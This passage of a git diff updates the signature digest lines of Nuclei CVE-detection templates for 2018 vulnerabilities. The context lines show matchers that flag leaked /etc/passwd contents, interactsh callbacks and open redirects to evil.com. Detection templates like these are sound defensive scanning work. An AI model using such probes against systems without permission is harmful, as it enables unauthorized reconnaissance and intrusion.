4b0a004830460221008463311ba125051726d5f1a72b274fa1a4eea120a3f92209f9aa8c0a806eeb63022100c6e0446246c72ba68b0e75b7b936e2da5fb30d0d77e56901a6b457ae72baab88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index ac8ac9c4d3..b495ebf611 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -36,5 +36,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a00473045022100897608b9ed2ff2e7847c46c4020488f2e3e307bab1a8ca5a9c7c53b77dac02f9022010696dc0434f9d98cbfcd6df8d1d0eac6d6fc62bdd72834b7c56700f21ad6958:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dd063d068f83aa5fc2c106a1d741a864feb6baccbdd2da191482cc74a704260b0220359591cec440117867142bc956bbf923b99f76ec1c9aadb8f36456875e412d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 8442ada48e..7b4fb7a793 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008baab1428a7f85dd4d3142ed65677f479a2c45a30d995298a1e983c85617406802207c759ef81e4d189643077670bd118db531f42c7f2618f36e47ae14111c83bb8f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022039d78d927676d081cf8bc125bf2b4636d95ce7b5ed125b3d5a44c88ad8beaf03022100c415e20469dbd90a1f4c0f03b6b18f51e39da9d9a86099c20a4f7d5b8d0d83a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index ad0021eae7..e7d06464cf 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a13359b79871cdeb2a0abf1f8397782d3d7f500bd57f306b43ed3079aeaaf157022100b26869a1df861c97a318666ff4df9f5363a9c2790d057a7885a6b6bcb37eebb3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210096d8b4849163bf46b2c4666fd169add83e8dc4443680f9bce243421820bddd7902204fcd56c4a947e6ebc35701d0534c1e430e8a4189c02dd39c11f50ae6d11b2245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index faf63122aa..6b952fcbda 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008b0ba740536ec2f6e88d647ed842a1d56f3dab9c98161b6ea1056f72afc68de202210094882c77ab746065a981fb78e230d01766ad87858e42809b48738647fd6790a2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203b6318938a9d0e2097dd3cc8af396ff739ec71eaa885e672eb433f6f417c0010022100ae437f9e42ea52066e3a5f192cd398f542b39287e37114a16e603a25c9738c12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 7b2b30b4b3..074f01ee34 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -41,5 +41,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4a0a00473045022040b29fef7515adcaf261aeedfad82a9e49721f6e53cede5882d98952bdf863bb022100c75315086e9678b85f842b89d1753702b119cfda939857a62c2aa85d980dd5a6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022066de70adaf3bcb1d99356fb8dbcc39784de8a5634949b8acef9a26f3ea1af9fa0221008e09452528a621354dba315f5c647b7892973879cafa88b757df99255d57eb2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 1424cc0e8d..a1b6143b77 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204576e359321cde225ac2c0e48854d62d67d24090f92eab708bc096907259b93c022100cfa9c8efd920cc7ce18d8987a650f6144a69dc412039868736951fa6954c57b8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201e752497b4a03c16660964f1854d6054c6394603ea46f3aedaec5e43e95007d8022100e18889e2c854b4e56c6a2ddecc5975bcaae607a2e637d00dcfd57c5d9a7dbe25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index fd926e39f8..4d1558d231 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -47,5 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and - -# digest: 490a0046304402200285747056763f6e85e1200f3ab13ea5863ec5ae406b2c761a25168d17eef2c9022015bbbb21d4ff1c3349efc6e1dee1eee301e3fa645d9ec75080dfb9ea9ba334bc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210093ddb91b5bb089f8637e4f17f115f216b8b8eacb6702e04c3a02f6364dd4dd10022100dd2ae9b9e676b65c6e71e34c7858d7933f7b91ac92f78700543a1a38334ba02c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 81bf4cf28b..15c50705ef 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -41,5 +41,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - http - -# digest: 4b0a00483046022100a1000f4e19ffe77a733cce8e023afc16acbb378570dfed888bcbd95ef14414ed022100b2f27f210573d2325f49eef742853b37876aceaddbf2f843b2593315fef447fa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dbd589aebad191a2e0736b9dcfc755758cea8b8f77ed6697b635556a400612a4022003d184e89ce7b4eadeb4e14e70bb7c27d3610cdabbd3a195634a940d6e44da5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index c13f9c2688..32b0e322d5 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -38,5 +38,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 490a0046304402203b13c1f1393912c9542d4cd6cf3365fa4bc5ee1f43a84520b3ad15415b2e4d6802200ca13385671c13c5170ed909cbbaae2678250e64a6bfc8b0dcb5e1295c8a7c70:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bc9f90af1475a059c8295c7d563d09e4c3a4205b48d2c8633d11d588d71a82c402207102fe71cac50dd5d5644f827ade79cc0b89c7cab66cf4aeddf2af14256c9a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 7d2f786e86..7db5064f17 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c50f2f4c9387bfc69ba043c61ae496b5cef55b75c85f2e6306da037c1a0cb65d022100ed7d9e84474f3aefa8c7c24caef1c1cb86069737ff70edb3f6b2695585ada2ad:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220467f85bf4d2a0966582319767443153b3ce00c5d4961e9eef69e2c6cd5c37dde022008aa6cfddd02845cb3c2daaae24610bc3ded809e4ea7b146c7325330b03d3423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index c31dc22af6..3d6bec26ca 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210086591a88a9cf812478916fde313fda7131d3c95f29e04c9173e8349300df634102201487eb64c9df4389d3fa608691ca37eec59fae49f5b0173eeba53ab2b54ba821:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205ab45c4105e14b0e86af35ebf0c679f67c1830847738f6a6caf21fac3df9df97022100f7e017ba01eed91c7fd19d5c20857c785b02f7385fb16e48986e8cc1c13c3007:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 08c76ce5fd..f2be829f68 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -44,5 +44,4 @@ http: - "** Platform sources **" - "** Application sources **" condition: and - -# digest: 4b0a00483046022100d5b58bb7933183fdc53320d29d10ece7cb38d9d8f214e7a789625fef1d8ed3160221009f84b6cd7619d94952bcca6c3719109c3f7f9534518a9b7a929cefeeaf2df2dc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cf5587b8bbfeed1318a13ff1cdaccc6a27232eea3b7b1469172e78593fd4a2ea022100ce899fa7313afbe4983ed5971dd5ecaa7e8054d9edb9ff6116622f12707fca88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index b412050dc3..a4ecd1aa79 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -44,5 +44,4 @@ http: - "" - "Reader.STATUS" condition: and - -# digest: 4b0a00483046022100c861c038f5ab1c9ef8fa08b272512a443ca35486a84bf610fbfc1b1aae787f8d022100b7680174852497f96c8ed8b9318639898707c73a75d3fa38cc300408e6f62847:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d9af420835d3dee984f017cfd2c57628be3b9e8828f7fc7278f7b059abbb323502210083460b4435ca4c7496732084b56e817ccd963b21e893ff5c8b035ac23517350b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index df7cf6845b..35e4ee647e 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -46,5 +46,4 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" - -# digest: 4a0a00473045022100b7dc81184d133fc85eab456378d2a006dab6e23380034d93e0e021a288e554ca02206b0debda47784ac6ed6e23374941263f094431d68fcadc6137fbff971385e830:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206d969081466cddbd2495d632ccb91f1d8039ecb465f532c949cfa75c280d8b5b0220784a774da00f7d8f5c2f8e425591bb86507e3b9764114885479c341c957397db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index c320fe0151..f88e10287c 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022079e088f9053e2ef2b17971ea0705b969a13bdffd5207a68f595564802ea62ad002201d37640984e3da2f94556a125ce3a57eb45eedc25162de809a435b24cfe05688:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e386237a513cb3139a5ffb6ab5a09bb92e812168051189b275ba54f9e1866f87022100f53b7bfaefbdb45a4ec5a7858e9fc8964b72b6573572056daba26166e80c968a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index eff00651d1..a013720e9d 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 490a00463044022035e105021657e6106c39e02ba70d44b57bae6677626d6c4c18df2215ad794df102202fa4304751d369e93793e98c97174d00045fa26dacadd21cc4f378632024cdc0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220398248bd0a40b04a7e4a20c7de1cbd4ca9c4ae5a3d1c6957622c09f49b518b3b022100bd8afdb1c70293017a231cd0f70e184c9b52fc0dc93ed11bf02f69d309881de0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 62ef8faba4..92c1c88547 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e796dec7c0bd948d986c43ca2dc7e4326e6ac886265b25a340de30e41cfc72fb02201be4e8b1dcb026b893fbd9dd9b124d6fc780ebfb4aaa23fc3fa7cd05147375c4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d19de9bcbbbe3dec0f11fe31f91ac9be961562a30c9049510a9d0b590766ba54022100a4b5de4056682483577628a54024b5a0230dd7b1f7829dd29ba5516b64ae6d1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 8ae603d0ef..6b95c59ac6 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220399e1a1661a77b6a5a5c2633832514326010e65a17e5b1e36dc842e32b6ce8ec022100c8ba0cfc86d1adc04827b2ee0a361e4070fdcebf4596f8874f4bd6f9f5ed4652:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100acdcb722f7747bbdf778fdf8728d78356e150a9621d058ba7e7374d7b1129585022100e36344334433070ceef144ec8953599e6e6d41549d69599ef9e949ec057a25b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 37b75dba9d..4ba52f6dc8 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -47,5 +47,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and - -# digest: 4a0a00473045022100ad1c86ad935372ce818adc2f392607576b49b4972e1ec0dfb0e264e17550705902202f4e6441a591a968d65035358b97d1cd0c138928d4b0a4e1150a16816f08f379:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dad8bd66eca7985b185bc6bd56b658f3e6c200f1276b6b027eab0850864ddf450221008a9bb6e00db439e62ea7864426ccefe02bfa9497558e2890460dcb2f17a7fb85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index b66fd66e13..7a0cd16677 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -51,5 +51,4 @@ http: part: header words: - "application/json" - -# digest: 490a00463044022033b86aa2b647d0e07bc9894bc306cf748a288da2c2b347b4fcaf5cdb9a33a685022063d803a9f02a4065779166504ad1306180195d2e57e34dcd6197744bf0f6a736:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008735ee5dabee05e7258f263c49c7f60f058b2aa7d0a3462e47121f37a63a1edd022016bfb823adfbfb67ce3a9363d807e31e0444ab2c9df492ebd0a816d119ac6200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 13ef3b80e9..b2a6ba390f 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -38,5 +38,4 @@ http: part: body words: - '{{md5(num)}}' - -# digest: 480a0045304302204c84c4884bf97caefbe2d95365b2e3220c663c096d9543e73c083e591d72099a021f56bd305b2a3f3a98b9bc7ce45172cfb84e9c34fba36fe03e1517e7e6a379e2:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200d740bef67e9310c17a132c97527520c016a2585355c4e019412199874b1d0c4022025e10b0fac591f0a6678c401f3530a20f47abefb5f0974b758bcb45d8798d8e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index b42d70ae73..c1fa4e2059 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -40,5 +40,4 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" - -# digest: 4b0a004830460221008e157da653657afa1b46703f3b0f07f6b3a6ddcfb282eda1b7c2d67aa9821feb0221008ce1909e513f61fe5353c29acd093f5585528c243b4393d5e045f0c288884336:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f44cfd6e36b1c2e629092890410d0c84f448a11c2aeb6b059d35f180d8044d630221008369a8c576d877bf2abc997407b3a64af24ae513797903450963614afe92eec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 2216a7926e..a089ce766f 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220200bd9b3a6449d159a8e874c97fa9ba7b8a130bfbeff32320f499a60d95f4211022100bb51fb1ea5cc3b711d0b07b7ef766378617836f15d5a9a6dfc0d5c1bcbde2622:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022000baadd742565df72e5d7ffead905593737bfd92e5849d26b9f795484036ad3f022100f5040c4b6e12558c1268ad33f0515c15a764a6d92f11f8c8187fd1501ef5d664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 67bde6d429..6f676f4694 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -41,5 +41,4 @@ http: - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\">")' condition: and - -# digest: 4a0a00473045022100d84959c99cabda60a5999b44fe4d326e2634d985e8401368c6c14c43688c24a6022053a8fc1324d4edf6d67cbf6b010c8a3546ec6ff419f683ae27558acf91005977:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206bdd373873d61543de0c774c9eddb704a6baf82cb881432d3158a9b169fa6d82022100d21073222e5a2f32f1f7f3153e696159818bc03d072d93c70fa14040ce9f0611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index fe9a7850a1..7963d4bdaf 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022054fdc7ccb1fa40acf27c928ec43774e8c1cdb68dec58df4ccfa7f33371546cbf02204437a51930405c798d71eb1f605a7e978f5d41bd8135beadbf0a6dbe2ba73839:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c29b376c9b4d818a4b27ea07b352dd22b73dc606fb83a101c75166e5ce3989a602201081685ba23ace5101fe3dd3aa62b56d342283033e8f568180c6b6839fb5d501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index e28a448719..19735a949d 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203c39ade3b6b45e8dddfc86610579f57318d021d22aa732bf44d23808305a8a5202207654f932f3a3a9ba9d8f81b81e722614bf45ba60e6a27ec71d22ff2e54376e9c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022048be23d487bb4e59bc3c3d5c17b07119602b27a416cff7c9f69daa654cab56d9022100f91d0189e70f35600739c5c5d5def4db1113f9806958ea221546130058124993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index d83eeafe35..3e22014f92 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f263eb166957ba331dd2a0136e34fcbe133a7a5922d4900f4b477ae7daa1059e022100e6e6589ac5f01a75fdaa313322770c4dbe4d06b43a3b9a698509021e276a9448:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d4ac6dee0930f157c706b837412f652de0dcb41a66bf508a6127e52556245e09022006eaf78deda5a4659915c5ffe0c917d54bc67c4d21a0f88185c73851b05a426c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 1719a1ac85..7e042cebe6 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206f0a6a393ac224e24a05642a9e6c016c03d01a0fe4eb5e53fd2f3f3bfa7fab580221009a7084474cd05192ce262ab56a36d48e19c5ddbddf58995de103e9fcc33bf426:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204c1202d5fe20e28d5eb40e644254397e2cee75e237e78e7dcb9844082ec388f702205798d08422faafdcf7860da502245da26a9d58ababa33413d634cf41568f6d02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index c4767e8efc..dfe6c9cde0 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207ddb116106d887cc1e4ccf0af68588a24ed75c46f157d931f6eb8e2a83981351022010a073ec07b71e03c9f51270700781126ab5f02e2bd253db3f1e00376ec8e44e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200c96dd635f6c5c9598582cf715afed6210390f396235e0361c52943257763f2b022100fb900ef821f9428c884dce00824b50fbf89a59c125527a0b7fcde6b4b9955b8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index cb8134e1d6..e182d24021 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -41,5 +41,4 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' - -# digest: 4b0a00483046022100c64dbc68144b657d73446ff90ea4bdd092468a1e0a33afcc386489ad7c05df460221008162f941a129d797a9b04d23c182ac0b161379e72b84360a6acace9a09e6851a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220462b2017ff0efdcd191bc06d4f031501730ff75b8abc1d9696f6b1c55cd7fbf30221009a8cd954fbaab5275bd3fe3cf9379db0d1de083a8de454ee01e1b56adb0058ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 71dac103f2..cda77c3c9f 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fb8c1c344f5163082ee0c2c5f74f5a75045dd5872000d3d65b882fbf8485012a02203769bdb8fdb4ef776224089d9ce3afe71d8b85e01828cbce9b2437035586192f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008ecd55d534d4e36a07e838aacbcec7984b07b676fe4e92aa469b57946cd500e1022100834dca96df9e97a9a5b66e3449fdf5f7de949a518cb958decb0acea9725ff4e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 8151fa8844..27b1eca06d 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f6f4494aa2a8a028a48f80364028baae338609a666b0cd6699a5b953cae32bdf02205dd56e229311bbeed3eea53caa0568d975cd2a7eda8fec15c1cfd22523428e36:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022028455c7171916c3ff506b7a8a5a3b02d66e80628fcbd9207ed860ca3e9eda4e1022100d5ce84955b15cd624ec850cb6b8c149cf4494dd8c789bcb85e51fba8e7004e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 7b3ee57e59..d1f7dab34e 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009fa1a8c3f15ab898a1bf21f0baff7423a52d6482f4560e388aa7ef2f2036ce66022100a69f33ccf5bb06d033958cc2b2046a91c3857e57475a52eae8d60c82f6827c9a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205dbba997698991fadd9d562e8fc3beeca5fd03ceefb8f4c762b5ab538d8c7010022031cbbb90af8295ed038bc1900e737e107b65f5b6e8ed4ae00810084e3bfc503b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index c34829f2e9..517d47db61 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -46,5 +46,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4b0a00483046022100e4698e6a5d041f02b23f92002f5f4bb81b5ea93b18166b1721fb6f6721d859ca022100d63c8eed75a9ca1a29a684f514f6f2bc98f321b3efd7a01d4f6d4b33f1a1a81c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202d562e15b950e46da76651d360e9bde74b3b99a8b42629a1f9ad5308cced35b6022059a992a8de5a52b561babc034aa060121adead118a0721973d7f0cce5c61be47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 16f2260c91..436554db24 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009d1f5ceab5d5a23c249c2230f27b17f4ba25657a861d1db703d000bc965f3a1802201350af6e20a5f992b1ffeb0bf9c802c82c71a6e3c5256f7f5e0886776830f067:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fec9a15c032b05996aaa1ed94cca7584f795e2686404c96e553a6c54e67ef44902206bac8554a88f06d19873c5eceffa23c10b3442da45fedd938c76751539fa3f96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index c227dd5a62..1966eb8ac8 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100909b1d4fcc99cafd561fe5fb959016ec5d0ac491309f17da63619a1c4e82a500022100a4e9613e3153d44d687a61059fdebe5017abd72dcad6d25a46a0a8416e2a8575:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202b1e3a7cc88f19ccaf65639d3ad004c92edeef26159a0f5652083a482e63de580221009e478cbe000a9a306b10206bffc144c603e3aa6e7e7b6c333e799e523d1a17a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 372b47f8b6..af9a6bca99 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -34,5 +34,4 @@ http: part: body words: - "